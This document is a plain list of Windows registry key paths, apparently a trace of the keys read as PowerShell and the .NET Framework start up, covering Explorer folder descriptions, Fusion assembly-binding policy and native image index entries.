HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Recent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_JumpListItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_JumpListItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine\PowerShellVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine\RuntimeVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine\ConsoleHostAssemblyName
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\index169
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\index169\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\index169\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,AMD64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.ConsoleHost__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration.Install__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration.Install,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.System.Management.Automation__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data__b77a5c561934e089
